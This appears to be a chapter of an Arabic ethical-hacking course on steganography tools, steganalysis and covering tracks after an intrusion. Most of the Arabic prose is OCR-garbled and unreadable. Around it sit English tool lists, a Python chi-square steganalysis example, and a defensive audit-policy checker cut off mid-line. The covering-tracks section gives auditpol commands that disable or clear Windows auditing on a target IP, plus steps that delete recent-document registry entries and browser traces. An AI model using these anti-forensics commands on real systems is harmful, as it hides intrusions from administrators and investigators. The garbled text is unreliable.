.4_jj£joix1Ij <JjUj3I ^1 jjoj ;4_LaVl CjVU^jVI 

LSB Coding -3 

Jil V*l JaSfl ciult ^ (J?/A^y)^uai a^JI ilL- jll E l jj) l^a ^ ^Ij LSB insertion ^ Ji. cUu LSB encoding 

dJI 

L_JC^i3l j! O-^VI Jl J5^J Aijjlall -C5 J jj^all C alxll ^ ^.Lja jjJa lAjj L_S jjoj b^ jl <KAa1I j AjjjuoII AjjUjII djUUill JlA^V 

pLja jJ^all ftUS ( ■ UjudJ l^.l^pJLuj|j <1 > nj l^ilc L_fl^xjll (j^J a aII CjUUill / flj£lll ^^Ic JSI <9j^lall cJ*^ L " J J J ^^ L C5^ 

. resampling j {Channel noise) 
Tone Insertion -4 

I— Ijaul AiUall 4 > ajklo CIjIasuII ,<aUall <jjaiklxi djUisu (jL^.^j (_3^^ a CP" L — 5 J^^^ SjLujj ^ djUUill ^jj a > >i1 ^^ic L_J jIjojVI li^ ^jiaii 
L_1xj^3I ^j^a .<iL ^aLkll AjjjuoII 3JLoj^)1I J j ^q^J 6<C jauia C-Laul l^jl La£ . J^^J cs-^*^ di jj^II dljLail J j <C j.<i>.a<ft 
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(low-pass filtering) cjLo^JI t . nyil l_j jLujVI ^cLoij a & jj^JI SjLij ^ <ULoij3l <jc- i L!a£H c_ b^ajl&l] ajjouIU 4jIx13 

. (AiV truncation)^4-^ £LkSI j 

.dl jj^II CjliLo ^ AjjjoJI diljUJl plLkV ^J^)ia3l £>i& (j-G 6^.1 j ^AJJ 4_1x-gjui3I dlLa jlx-<Jl ^lik] ^c^l^)J 

Phase Encoding -5 

jj-gjIj ^jL ,cAiLiJ! Jldj jll ^.1x^.^31 aI^^JIj aA jV( <--) jj^all JIaiLuj! l^ja ^jj jll <i^.^<JI 4iU j ^jj Phase coding 
<jjji^j jll s jl^VI J (phase spectrum) l-LjUI <k J (phase shift) o^bja^ll ^ 4jj^> 4JLu> jll cjIIj 

.(signal-to-noise ratio) *L^j^JI J] sJ^VI c> (sfl/? encoding) 

Audio Steganography: DeepSound

Source: http://jpinsoft.net/DeepSound
sbVl !:^U csLSaj . (WAV and FLAC)^ cjULJI J ajjjJI cjUUJI ^> £ jj ^1 *tiaj Jc cihoL^j Deepsound 

.i>^ ^j^ll cjUUI Jc a jjlS I^jI U£ . j^Vl jUl J uj^ (Audio CD track) 

(jja (jjj jlxll (jAiVI jjlU jiJl ^2 Deepsound c ^ ^^ala ^ j-<JI (jiajximt 3 > ^ aj c JaUll L_aLa3l J dAiUJ! J jj^a jll 




Audio Steganography Tools 

Mp3stegz available at http://sourceforge.net 
MAXA Security Tools available at http://www.maxa-tools.com 
BitCrypt available at http://bitcrypt.moshe-szweizer.com 
MP3Stego available at http://www.petitcolas.net 
Hide4PGP available at http://www.heinz-repp.onlinehome.de 
CHAOS Universal available at http://safechaos.com 
SilentEye available at http://www.silenteye.org 
Quickcrypto available at http://www.quickcrypto.com 
CryptArkan available at http://www.kuskov.com 
Stegostick available at http://sourceforge.net 
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Folder Steganography 

.Invisible Secrets 4 Sl^VI ti^=^ u' ^ .dj hK^ l *tik) jjAj Folder steganography 

Folder Steganography: Invisible Secrets 4 

http://www.invisiblesecrets.com 
t> Qi^l^l] £±s jIjV! ^ c> ^jjjilVI JjLoj j -kaUJ ^Jillj CjULJI jjii^ jj j& Invisible Secrets 4 

^ ^IjjVI £>i* j 6C_JJj3l diUij^a jl Cjjj^all CjUL jl JjJ^all *cs-^ ^ J3"^ ^Ujl! £-^J 




[Figure: Invisible Secrets 4 (http://www.invisiblesecrets.com), "Decrypting Package" step: "Select the files you want to include in the self-decrypting package (You can add files by dropping them on the list). NEXT to continue". The file list has Name, Type and Full Path columns (HTML Document, Crypted File, Cascading Style Sheet and ACDSee JPEG Image entries under a WEBSITE\Templates folder). Buttons: Add Files, Add Folders, Remove; Back, Next >, Help, Close.]



jUjkJI folder steganography CjIj^VI 



Folder Lock available at http://www.newsoftwares.net 

A+ Folder Locker available at http://www.giantmatrix.com

Toolwiz BSafe available at http://www.toolwiz.com 

Hide Folders 2012 available at http://fspro.net 

GiliSoft File Lock Pro available at http://www.gilisoft.com 

Universal Shield available at http://www.everstrike.com 

WinMend Folder Hidden available at http://www.winmend.com 

Encrypted Magic Folders available at http://www.pc-magic.com 

Quickcrypto available at http://quickcrypto.com

Max Folder Secure available at http://www.maxfoldersecure.com 



Folder Steganography Tools
\ LjJ\ 'Invisible Secrets 4 J\ Ait^ 
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Spam/Email Steganography 

±jA\/4j^jA\ JjL^j l^jlLkj JjjL JjI^JI JLu>jj jjAi Spam/email steganography 

.Spam Mimic staVI ^ s^Luu* ^ tl£^ I^a -c _^iljc. jjUuluJI djU^jjl j^. ^ s^Lai* ^ tAjj^joiaJI cjVI^ jJI 

Spam/Email Steganography: Spam Mimic



http://www.spammimic.com
JjI^ j aIL* j3I j^j/ j^ji? ^jSj .Peter Wayner J Mimic ^ Spam Spam Mimic 

(Spam) ^^-^ ^-^j 'So^ <JIjujj31 j^j^ l^^ 3 Sl^VI jjq/nMI/ j^jjll . j^jjll j jjq/^u tila ^ J£3 <*-j1j-^ 

.^Liaill t fake Russian 'fake PGP ' jjj* ^ 




[Figure: spammimic.com encode page (www.spammimic.com/encode.cgi). Alternate encodings: Encode as spam with a password; Encode as fake PGP; Encode as fake Russian; Encode as space. Navigation: home | encode | decode | explanation | credits | faq | feedback | terms | Francais. The output box holds the generated spam-like text, beginning "Dear Colleague, Thank-you for your interest in our newsletter!" and ending "Thank-you for your serious consideration". Below it: "Mail it (Zap this message into your mailer . . but it won't be sent until you click on Send)" and "You can copy the message out of the text box and paste it into a mail program: How to copy and paste in Windows; How to copy and paste in X; How to copy and paste on a Mac".]
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Natural Text Steganography: Sams Big G Play Maker 



.Play ^AaajomH ci^ L>^ 4^*-^ I j t mMl Jj^Uc A ual m^l CjLg jIslaII Jjj^aj ^ jflj Au (JLlLa jlx-al! e-lik] ^c^l^)J 

.natural text steganography ^ Sams Big G Play Maker 

jju^ JUi ^ ajjjoJI JjLuj jll V^^aj ^ ^1 jj^j <Jj*jJe1I ^Uaj ^L** Sams Big G Play Maker 

V tSbVI ~\ iklxA j IajLuuI ^jj ^^jII 4_jjjoJI 4JLoj^)3I ^jj - gall <JjLuj^)3! ^^^ic d^Ic (3flaij 11a .aj^Ia^ jl aJjoi^ (Play) 



[Figure: Sams Big G Play Maker (tabs include General, Wordlists, About). Generated play:]

(Phil stutters 1 times)
Mike says "Mine's a pint"
Harold says "Hot steamy grits!"
(Adam stutters 1 times)
Jason says "Alive"
(Jason scratches head 1 times)
Jason says "Yes thank you."
Adam says "Where?"
Harold says "At your command?"
(Mike strikes Mike 1 times)
Phil says "Where?"
Paul says "What does MPEG mean?"
Paul says "Ah! An earthling!"
Kenny says "Hot steamy grits!"
(Mike steps forward 1 times)
JYA says "Mine's a pint"
Mr Hanky says "Hot steamy grits!"
Mike says "Hot steamy grits!"
Phil says "Did he mean to die just then?"
Mr Hanky says "I never talk politics"
Sam says "Mike you ladyboy!"
Jason says "But I read slash-dot"
end of scene



(Issues in Information Hiding)^-* jk-^t ^ JjL*a 

Steganographic File System -1 

.^Ajlill ( auu^i cAiLJI ^Uaj (j>uia <jujL ^ II dLa jlstxJI ^ 1 > >ri ^^-^ 6 steganographic file system ^ 

C5IJ CjUjkJI c> (allocates dynamically fragments) el Steganographic file system 

^Lq^JLolaI] Uiajl ^ajujJ .L-flJjJa-all Cjl ^aUaj (j-ajJa l^^^ c — eli^-j-J 6 oO^"^ j^-?" CS"^ ^ J^- 

.l^ik AjU^II S^l&J ^ ^311 Jjill ^i^i3 Uiaj! c_j jlk* - 
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(Need for steganographic file systems) ^IjpjjUjIuJI cMIaSS ^ulafr ^UL^VI 

(jj^J qAa jaajud^I] (j^J tft^A (j-a o^cLoui £x» ^ ^JJ^ *^L>^ 4_ii^xJl diULull AjsLjal ^IjC. jjUulLoJl ClAiLa 4_xJaj| jj3 jJ 

^1^)^.1 (j^akjuJl C5 ic t . tdlLa jIslxJI Jl <J jj^ j!3 _L_fl j^. (jj^ l^LdiaJl jl (AjjL^jII jIjjujVI ^J^^ CjU» jLlxJI 

^ ujj a V diLa^lx-Al! e> \ I Cj I ilflj i aLq ^3 CjLq^ Ijla II ^gil (Jja^^II V La^JjAj Ai^st^l^ a^ ^Iaa II dAjj^VI 

J^ajJaJ (jl <Jj3 (j-a l^Jl <J jj^ jll (j£-aJ V JljC- jjUuloJl dAiLJl ^aUaj (j<u >i ^Jti ^31 djUUJl .ClAjLJl J ja. j ^ j£j (j^ J 

4-jjjJ) cjLjI^a Levels of Visibility -2 

1^3 t^jJal j <J^-^ 'Qj" ^Jj^ ^ cs-^S ^ J 4 ^L>*^ Jjic- (JjSj 4jI 4_^.j^3 c-UasJl AjjjulL (JlulS ^j-L&jJalU 4jUr. lil 

^jj 4JLoj^)3l ^jjLdjJaj l^ja ^jj ^31 <L^)]a3l j _^ 5 il£ Jalill (jl (^^-ixj l^a tSjjj^ll Ajjjuu ^jj ^3 lij 6<J!L<Ajj <J^3I cs-^ 

La LJlx. tdjUUJl <3jjuj ^Jl .V J 3joj jjoia^Q JJC. CjUUJI Clljl£ lil (JjJjIa (jC 1&.1U^J 
;CjUUJI £ jjJa j SijJ ^jd .AjjUII 4^^l JjVvh jl jjj«2 Al jU^I Uiiili ^Jill L-iillujVl t> ^JAxJl ^jjj 4_jjUJI 4^^UJI 

.CjUUJI ^ c_ic;^j3I CjVUu^I (j>» Liajl ^jjj 11a jli 
(Robustness versus Payload) ^-Sj^JI 3JUa11 -3 

File Format Dependence -4 

(jl iossj information ^ <ia j^ > ^^ CjUL ^l lossless information ^ lSj^ ^ CjULJI Jjj^j 

^^ic (jjA^UXJ V (jJ^i.1 (jl (j^- ^ 6 Jalill L_aLJl (jAniJJ ^^^Jc Axusu dAiUJ! (jj^jJaJ CjULftC (J^asu ^UasJl ^ 6^ j^. j-<Jl AjjjoJI diUi jIslxJI 

(Jj^aall 4_iLdc. ^ - ^11 ^l^cVI (j-« ^.c ^ ^JJ Sjjj^all floating-point ^— M * jp&§ 1 ^ jj^ f / * a ^^ (jj>»i1 

/ojjj^II ^ Ja j^U L_fl^llkl (_^l A-AaslSI (_^^JJ V .6Jjj^3I (j-d ^13^^ Li> * ^ 4"^^)^^ ^Ua^.1 ^5^JJ (jl (j^J 6^ 

Windows Bitmap (BMP) j^^^ ^Inx^JI jjlj^JI .<ailj pj^aj jl (j£^j dAiUJ! jli ttilli ^ ^ jll 

4_L^aVI jj^ill (JjS^ ^Ja j^JaJ I jj^JI .Lossless compressions 'Graphic Interchange Format (GIF)j 

Steganalysis 

Steganalysis ^ ^CjUUJI ^li^l ^^l-j steganography .steganography ^ a+Ac. aaLc ^Steganalysis 

(jc i aJa£JI (j^jj .<!Lujj3I tilt ^jIujj J tdli (jl£ lilj tSjiuiAll 4_jikJI aJLojjII aAa m a^lA\ CjUUJI (jc t a>^<U ^ iklujj 

^^Ic JJC. lS^^ *^J^^^ djlilxJl ^L^.1 j dull iaLftjl (j^ (Jjjill ^ J^^l J^-^- (j-« <!LuJj3l 

.^uiLxJI djUi jlx-<JI ^^ic ^ 11a (jl jfi*^j .<JLujj ^IjjU ^\ n un c _^j3I Sjjj^aJI c al un^l Steganalysis <^ ^ j*^ *^ j^>^^l 
.chosen-message attacks j message attacks :cj1^j1«^I pU^I ^ CjU^JI ^Ijjl (> (jl^jj 

aJLuo jll ^ILkl (> L&j ^1 JaUjVl steganalyst .cJjUaII stego-image^^ ^^^^ ^j^jj ^ Steganalyst 
.JaLajVl ^ Cjli^\lkVI cJi^j ^^>*^ stego ^Ia^LujLj 3JLujj pLuijJj Steganalyst .^-S^jjJI c j 

^j^i3 stego-image a? jjj^^ .stego-image ^ ^ ^j^J^ o^^ j^^ t> ^3^^ c> ( ' q > ? ^ jj^ 

4_^jJal j (jj^J l— it auS jlill (j-o ^jAslSI ^AjlS jJ cJ^-^^ StegO-image l J *\ h*W Qii b .Ia jlikl ^JJ ^^jll diUi jIslxJI 

,fl laaJI ojjj^ (j-<i (jl jlVI CjUu£jujI (j>» ^jAslSI a I I^JLujI j 

^I^jjojU djjj^II cJ^-^ l^jli^l (^ill CjUUJI (j^axj ,4_ii^<JI aJLoj^)]! cJ^'^ jl j^^j (j^j Stego-image ^l^iLu^l ^^^aj 

s^jlill (jj£i (jl (jl^j Image Domain Tool 

: Steganalysis^^ 

A3 jl Jl5 4_i3 4-iLuIaII CjLq ^lx^ll J^-±i 

Suspect information stream may or may not have encoded hidden data 

.4.1*3^)31 jjj^II <J^.ta b\ ±a aII CjUjI^xJI j s^liS (> Ul^II - 

Efficient and accurate detection of hidden content within digital images 
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SjLuj] jl L_aLJl <J^.b A h a - ^ JjS A\ CAjLJI jjq ujj 

Encrypts the hidden data before it is inserted into a file or signal 

Steganalysis Methods/ Attacks on Steganography 

i^VtS ^! jjl Steganography ±± cjU^JI ^j^s 

Stego-only attacks, reformat attacks, known-cover attacks, known-message attacks, known-stego attacks, chosen-stego attacks, chosen-message attacks, and disabling attacks.

Stego-only attack

jjj^ia (jc j& ^ j^^ll t . iiaaj 6^1^. jll <L^)]a3l m ^ j^^l ^iii j ^ stego-medium l£ ^ *^ LgAao ^ w j ^ ^ ^ 

Reformat attack 

/ alia a (J^>iaJ diljUJl ^jj^aj j£j Aill^xJl CjlilxJl t^ilaj. ./il Cilia. ,L_aLJl J^luijj Jjlisu ^JJ <L^)la3l J 

Known-cover attack

di^j iajLojjll jjij <j JUI c> l^j .cover-medium stego-medium ^j^j ^ j^-^ ^ <J.ikU 

Known-message attack

^ ia^Si 4JLuj^)3I ^I^jI A-i&iH <iajuj| jj .stego-mediumj ^ j^-j o^j& ^ j?^^ o-* ^ j^l ^ 

Known-stego attack
.^tla Stego-object j cs-^ 3 ^ L_aLJI j CjLg jLlxJI ^ILk] djU^jjl L-aj^su ^jj ^ j^-g-Ii ) J 

Chosen-stego attack 

jo d^JI .4^Lk obi ^l^kiujU aIL* jll ^ stego-medium Jl forensic investigator 4^ f j**^ t> ^ 

<> ^^11 11a (jl^j steganography mediums i> cjUjSj^I 

Chosen-message attack 

li* <> c_fl^JI djIilJ! Al\^Jlsteganography ^steganography ^->M t> stego-object 4aj Steganalyst 

.steganography J ^^steganography ^l^l^l ja^j ^illj stego-object ^ 

Disabling or active attacks
A1&& si&l rotate ^sharpen < (noise reduction)^^ j^l JJis 4 (blur)u^^ lU^j ^1 j <*l j^l <^ ^ t Vu^j 
s^^h J^4? c_jL^ JjjL ^ jjUll JJij j cjVj^II J^-^ Disabling attacks . soften j <(resample) 

^rj> > >>ll .stego-medium ^ blurring ^ ^ j -^j^ uj^^ ^ 

(uniform noise) ^l^aj^l .Sjj^J! ^Ij^o jj^ j'j^j stego-mediumj (random noise) 

^ Sjjj^all J ^Lja jjJal! (noise reduction) .c^^ 3 ^^ Jjo£J1 a^i ^11 jlVI j Jjo^JI ^Ij^] 

dia SjjL^xJ! . x^i jjlii]! jj <iV .blur ^ ^>^l*^Si j^-^ j& Sharpening .l^^ ^ ^ j^j l!^'^ cJ^-^- 
.l^k^j yrSaxJ stego-medium ^ Rotation .cjUjI£3I AiU Jc jj^j U %^ j£\ 

j ^Jaii^Ji raggedness c> ^Jl ^^Luj ^j3I (interpolation process) ^lin^VI ajL& lJ^xj U lUIj Resample 
uniform blur cS^j Softening of the stego-medium .s jj^JI jj^I Resample s^lc ^^i^j .stego-medium 

.blurring c> JSi (Contrast) u^W^^ c> ^Ij^Jl o*h^ s jj^' J! 
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Detecting Text and Image Steganography 

4- ^vi"i* jj£ CjUJ! ^^kjja£i JIa ^ . {cover medium)^^- ^LuiLo^JI jl <jjjuJI CjU jl^JI *lLkl ja j& Steganography 
jjc. ^jj-d^jjoixJI j>» <jojLud^JI CjU» jIslxJI ^li^V .^11 'HTML t(j^51j t^i^i^)!! jjj^IIj cjL* jjuj^JI <JiL<» jii j.nx£]| cA ^ cjLLijI] 

SAl^xi L_u3LojI ( . lllaJJ <JU3l dlliLJl ^\ jj| .^ikjjuixJl diliLJl ^^ic bLucI (JjlaJ ^aJJ 4_lik-<Jl CjLLlJl jC C Aaj&II .<J ^ jj^axJl 

VI <JLujj3I ^ jj C5 ic jl j^j V <Lj]a3l c>'±& JIoj L_flL ^ <Lojj3! ^jj L^Ak. .4jq^ A\ JjLuijII jc- t L^l] 

Text Files

JaLajl jc laall J^lk j-o Cj^IjAxjII £>i& jc c Lj&H j^Jj .^-^-^ pU^V L_flj^Jl £jJa j-a ^^ic lIl^LAsu ^1} tAjj^aill dlliLJl ^ 

XL jUll CjULuiaII j* (^^Ic JAslSI j tlxiJl £^ajjl t^iklauJ! AjlIII j tdjUljiajJaVI j* l$\ jl (J-^Jl 

Image Files 

JjAsu ^kl 4(JjAsU ^kl ;L_aL» <J£ju1J A^^Ji e-l jjuj CjI jmMl ^-^j LS^^ 3 *Oj J ^^ LS* ^ <^5^l CjL» jLlaII jc ' j£*j 

.ciLJI j* jl jlVl C ! jllj 'yr 1 ^ fi^ 11 

^jialjlial jjuoc (Jal jl Aj^I JaVl jl /ojjj^II I^I^jjujI j^j ^U^^-Vl iJjlv^l l-uILojI 

LSBs jl ^^j^l j^ 'c^^j .U^ ^ s jj^ 5 ^^"j ^-^3 LSBs jl jl *j cr^^j s cS^f^ ^ > ^ 

t lfrLa£l J ojjj^II <J j^. CjU» jIslxJI j>i jj^li l^-jl ttilli j-d .^1 JJ^C dljujj] 

^j^aLiJI LSB t4_Jlc entropy ^jiAxJI CjULiJI ^ .<^l cJ^^ LSBs ^ 'Oj^ <J) ^-^j ^U^) ^ 

U£ j^ 6 LSB ^5^* 15^ 1 Jjlaall al iklLujl ; ,4_ij| jJaC JSI jl jj£I ^Aj ;Jj^aVI jc CjLg jlx-d ^jl^J V ^UasJU 

j^J AjjjlaJI ^J^lj jjuaslSI 
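The LSB analysis sketched above can be made concrete with the pairs-of-values chi-square test of Westfeld and Pfitzmann: LSB replacement moves pixels only between the values 2k and 2k+1, so after full-capacity embedding those two counts converge for every k, a statistical fingerprint a detector can measure without knowing the tool or the message. The Python below is an added example, not code from the original text. Its cover is a constructed 8-bit grayscale buffer whose neighbouring-value counts are deliberately uneven (a crude stand-in for a real photograph), the payload is pseudo-random bits standing in for an encrypted message, and the chi-square CDF uses the Wilson-Hilferty normal approximation so no SciPy is needed.

```python
"""Pairs-of-values chi-square steganalysis of LSB replacement.

Added example, not from the original text. Assumptions: the cover is
constructed (seeded random bytes with 60% of odd values nudged to even, a
stand-in for the uneven 2k/2k+1 counts of a real image); the payload is
seeded random bits standing in for an encrypted message.
"""
import math
import random


def make_cover(width, height, seed=7):
    """Constructed grayscale cover, one int per pixel."""
    rng = random.Random(seed)
    pixels = []
    for _ in range(width * height):
        v = rng.getrandbits(8)
        if v & 1 and rng.random() < 0.6:
            v -= 1  # create the 2k vs 2k+1 imbalance a natural image has
        pixels.append(v)
    return pixels


def payload_bits(n, seed=99):
    """Pseudo-random bits: an encrypted or compressed payload looks like this."""
    rng = random.Random(seed)
    return [rng.getrandbits(1) for _ in range(n)]


def embed_lsb(pixels, bits):
    """Sequential LSB replacement over the first len(bits) pixels."""
    out = list(pixels)
    for i, b in enumerate(bits):
        out[i] = (out[i] & 0xFE) | b
    return out


def pov_chi_square(pixels):
    """Westfeld/Pfitzmann statistic: compare the count of each even value 2k
    with the mean of its pair (2k, 2k+1). Returns (chi2, degrees_of_freedom).
    Full-capacity LSB replacement drives every pair towards equality, so chi2
    falls well below the degrees of freedom."""
    hist = [0] * 256
    for v in pixels:
        hist[v] += 1
    chi2, pairs = 0.0, 0
    for k in range(128):
        even, odd = hist[2 * k], hist[2 * k + 1]
        expected = (even + odd) / 2.0
        if expected == 0:
            continue  # an unused value pair carries no information
        chi2 += (even - expected) ** 2 / expected
        pairs += 1
    return chi2, pairs - 1


def chi_square_p(pixels):
    """Probability of embedding, 1 - CDF_chi2(chi2; dof), via the
    Wilson-Hilferty normal approximation (adequate for dof >= 30)."""
    chi2, dof = pov_chi_square(pixels)
    if dof < 1:
        return float("nan")
    cube = (chi2 / dof) ** (1.0 / 3.0)
    mu = 1.0 - 2.0 / (9.0 * dof)
    sigma = math.sqrt(2.0 / (9.0 * dof))
    z = (cube - mu) / sigma
    return 0.5 * math.erfc(z / math.sqrt(2.0))


def verdict(pixels, threshold=0.9):
    """Classify a buffer; returns (label, p)."""
    p = chi_square_p(pixels)
    label = "LSB replacement likely" if p > threshold else "no evidence of LSB replacement"
    return label, p


if __name__ == "__main__":
    cover = make_cover(64, 64)
    stego = embed_lsb(cover, payload_bits(len(cover)))
    for name, img in (("cover", cover), ("stego", stego)):
        chi2, dof = pov_chi_square(img)
        label, p = verdict(img)
        print(f"{name}: chi2 = {chi2:.1f}, dof = {dof}, p = {p:.4f} -> {label}")
```

A p-value near 1 says the LSB plane is as balanced as random embedding would make it; near 0 says the natural imbalance is intact. The test is specific to sequential replacement: a small payload only equalises the pixels it touched, so in practice the statistic is computed over a growing prefix of the image, and embedding by ±1 (LSB matching) rather than replacement does not produce the pair equalisation at all.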

Detecting Audio and Video Steganography 

Audio File

;aJU3I (jjUl aIa^IujLj I^jU^I ^^1 jll 

,Cj JJ^II L_flL» ^^Ic Uiajl LSB ^— A I laajujl ^aJJ dlla Cj JJ^II Cjl aLdl a laJL cJ jl Uiajl 1 g <Lj *^ - ^>^N/1 (Jjj^j]| <L^)]a 

,CljL<i jlstxi ^^Jc J jj^^J] 1 ^ > ^^>^ j^d ^ J^^> J^C. dib^jlill 

Video File

La) Jalill jJ^liill ^ AjlLk] ^aJJ dibllldVI j* ^ jj ^1 <— 1\ Ji CjULJI j* ^ jj ^1 jl AjjjoJI CjLg jIx-aII 6 jJ^iill CliLi jlx-ft *ta^J ^ 

jj^ill CjUL ^ <j>JI cjLLJI j& cA^ll jli tgJLilLj .image steganography J audio steganography ^1 j^l ^l^i^L 

djLUill jC c <j> : >i^^ I^qIa^LujI j^J djIc-Lajlj A > ^nl ^ ^l j£l .Ajj jj^II CllliLJl j ojjj^ll ^ ^Ld^JjauJl l_u3LojVI j-« ^-C j-<^<i j a > laJJ 

,4jJjaJl 

Steganography Detection Tool: Gargoyle Investigator Forensic Pro 

Source: http://www.wetstonetech.com
£*l jJI j& di^ll cjVI jl jj*-a j^j^ ^sj^ ^-^h ^jLL^ ^j^j sbt ^ Gargoyle Investigator Forensic Pro 

4j^^)i3l CjliLJl ^15 L— laall 4)\*\C. jl i— li^ ^c^L^)Jl 5JIj) CIuj j] j (^^^ Ll^J ^g^c jjS«-!l j£-<uJl j^ _C1jIc. jloxJl j Ai j^x-<Jl 

'Trojans 'botnets ^ ^ 6 ^ 20 j* J&l ^ c^J 1 ^ (signature set) <y31jj cilLj . j^ ^Lj±> ^Lkii^ll 

^al^ki^L UjUjI <aj ^1 Stego ^ 6 U j^j Keyloggers 'encryption 'steganography 

J^l j^ iJja J ajIIj ^jIS jjj^II J^- 'h^ ^ 'S-Tools 'Weavwav 'Blindside 
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Steganography Detection Tools 

Cj jj^IIj jjj^I! Jlxi 4_Laijj]| ^kc.y\ (JjLujj 4_lik-<Jl CjL» jIslxJI S Axlai 1 j L_Lu£3L till ^ajujJ CjL* jlstxJl s-likl jc d fljud^ll lIjIj^I 

;diLa jIslaII e-lik] jc c ftjjj^ll CjIj^U 4_ajUs Jj LuSj . jj^iillj 

Xstegsecret available at http://stegsecret.sourceforge.net
Stego Suite available at http://www.wetstonetech.com
StegAlyzerAS available at http://www.sarc-wv.com
StegAlyzerRTS available at http://www.sarc-wv.com
StegSpy available at http://www.spy-hunter.com
StegAlyzerSS available at http://www.sarc-wv.com
StegMark SDK available at http://www.datamark.com.sg
Steganography Studio available at http://sourceforge.net
Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net
Stegdetect available at http://www.outguess.org



COVERING TRACKS 5.7 



„ jj jj;^^ jl Ai^jjaixJI a£jjoJI Jl J jll CjVjI^<» jl <loijUui ^Uj! l&jLuijl ^31 f<N^ > J) j| dj| jL.ha3I ^j^?* 4j]a«j3 

? (Why Cover Tracks)^) jtu^t A^u ^1 £tfaJ I jUJ -4 

tdlliLJl £JJJ j 6 (JLonl! dj!>l^jaj j^-a .6^ j Jc <JJ^ ^jaui A-ilc t . la>J ^i^-all .djl jL.ua] I laxJ jll j tA-iSLjal dll j^l ^jjj 

J CjLl^JI t . ilaa] (jLoVI dibl^cl jniul ^Uaill Jxill tillLJl 4_njj <JjLojj13 La£ jj^l^ll 4_ia&VI ^JL j*I j& j^g-II CjULic j 

fi^lfl all jli 4 JUILj J^JI (J^liaV ^Uaill £ jl jll (J^ajS J ja» j fc*Ui AsU ciljJJ L_fl jjuj ^.l^all jU tliA lilfl .(Jj£Luia]| 

Jj J j^Jl (Jj^ i ^ S^tcl 4CjIjLuia3I L^i^. j\ £ al\ JaC. lij .L-Jj^illj J jj^a jll Jc JalLaJl J^.^i3l Jc. J^-^J ^*J^J 



,^t]| t^jjj^lVI ^^>^l ^^^-^j t^LiSj^-^l djLLud^J] 
.Ail ujj£l ^jj (jl (j-o ^'-^ J »a 1$ all (jli (JJ^JI ^"'^ JT4^

I^VI (>« SJcLuiAj J^wJI dililaj uaP^Ull AjIaj aA.l$ al\ 

.ol jU-l uj^ Jl Jj—A, » J jijll J^a : SECEVENT.EVT (Security) 
JSi cUj V ^Vl .driver : SYSEVENT.EVT (system)

:APPEVENT.EVT (applications) 

:COVERING TRACKS dtJL«ul»

V t * < J'V ^ J£f*^ AjI CjI,!^.] oLSjVI (Jjxjoij <<^-^ * ^ (j-G djJj ^3 (Jj£j <Lala all Ua^Jl JjLujjj a!1 jLall cJ j^lt 

(jJLnJI jl£ li) li& cj^j cj^-^uJI <it£ j Jj^»1 rootkits ^cjVUJI o^xj ^ .^IkJI Cx^u^ JjAxj] s^LaiJI 

^1 Cj^UuoJI (> JaA9 *l j^Vl csSUS 3Jlj] CijIS lij tjffim^t ^ ^UjSVI CjUUxJ JiUajl S^&liS ^> jll J jJal 6 Jjil ^Uajll J^AjuiI jjJJ 

4_ikij3 ^^klaaj ^1 CjIj^VI c> ^j^xJI ^IUa . (original attributes)^^*£\ ajIL^s ^ s 6 ^HiJ L&La*j ^1 
> kl^ll (attribute) ^ ^ j ji*^ j c < -^ d 6L - S ^ ^jta .NT l)^*-^! AiisLLJI CjljLauJI 

(calculation)^ ^ * ^ ^ ^ .L_aLJI ^^ic jjq> : >iMI ^jjjIa l-jL ^ ci^^A 3 *\*\\ djUi jlx-^ ^JS lij L^c 

Ways to Clear Online Tracks

Private browsing
History in the address field
Disable stored history
Delete private data
Clear cookies on exit
Clear cache on exit
Delete downloads
Disable password manager
Clear data in password manager
Delete saved sessions
Delete user JavaScript
Set up multiple users
Remove Most Recently Used (MRU)
Clear Toolbar data from the browsers
Turn off Autocomplete
In Windows 7

o Click on the Start button, choose Control Panel -> Appearance and Personalization -> Taskbar and Start Menu

o Click the Start Menu tab, and then, under Privacy, clear the "Store and display a list of recently opened programs" check box

From the Registry in Windows 8

» HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer and then remove the key for "Recent Docs"

» Delete all the values except "(Default)"



Disabling Auditing: Auditpol 



http://technet.microsoft.com/en-us 
t^^JI ^Uaill (auditing) <jyaii3l <IU> j*(cmd) j^ljVt ^1 ikU Sj^SSI <jJ ^ill ^Ig^ll JjVl £jI j^aJI l>* j 

.( [network sniffer] 

cJ^> .(U^ -UajjjJI syslog jt) (event log)^^V( ^I^Vl l!^^ Windows auditing 

^ Ailjlkl JjUj ^ (Windows auditing) 

jjaij 3JU> 5i iajjaij j^ljl jkuj I^jIS l^l^kiual ^jSaj NT resource kit ^ c> * Auditpol.exe sbi 

.^jk ^ja* 2 (Windows auditing) fLkjll 

jl^aJI J] (Null Session) J* lU^ t^^ls <u£*j <>j . WINNT J-^ J) £^ <^W-^ ^

C:\> auditpol \\<ip address of target> 

jj (auditing)^^ jllkj jl jSaj <jl ^ .^U^ll aJUJI (auditing status)^^ < cJj^ liA 
C:\> auditpol \\<ip address of target> /disable

CjIjjAj s-li^V U^** ^ .cJ^VI (j-a (^1 (J? ' ^ es-*^ Cj!>L^juJI dAiLa t alia a djl jjjxjII j>» ^jAslSU l_s jjuj ^I^^VI 

Asu 6<iac j-<i ^.I^jjVI -^>^j .auditpol.exe ^acLoiaj ^jjSajII (JaLxj t^^Lk^ll Jja j^ Ajjh) cjI jUldl l_lo£ <Ja^J 

.audit.exe :£bV! ^l^kiujU ^ j^i s ^ JjS^jII ^ ^ jj^ 
Audit policy c^^' (> 

.(Administrator) j^^^ ^ v^ .. i<^ Command Prompt j^ljVl ^iL ^ 
;^U3I j^VI ^> cilli j^ Audit policies ^ 

C:\> auditpol /get /category:*
i^JUl! a^UL J!^k &a t*Ui ^ij Audit policies c> c£' 
C:\> auditpol /set /category:"system","account logon" /success:enable /failure:enable



[Screenshot: Administrator Command Prompt. The auditpol /get /category:* listing shows the Directory Service Changes, Directory Service Replication, Detailed Directory Service Replication, Directory Service Access, Kerberos Service Ticket Operations, Other Account Logon Events, Kerberos Authentication Service and Credential Validation subcategories as "No Auditing"; the subsequent auditpol /set /category:"system","account logon" /success:enable /failure:enable command reports "The command was successfully executed."]

.[auditpol /clear /y] j*VI <> c*Ui ^ Audit policies c> <yj^ 
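A defender-side check for the policy dump shown above, as an added example that is not part of the course material or of auditpol itself: it parses an `auditpol /get /category:*` listing (layout assumed from the tool's usual output) and reports subcategories that fall below an assumed baseline, which is how a `/disable`, a `/clear` or a `/success:disable` change would show up in a periodic review.

```python
# Added example, not course material: parse `auditpol /get /category:*` output
# and flag subcategories set below an expected baseline (e.g. after
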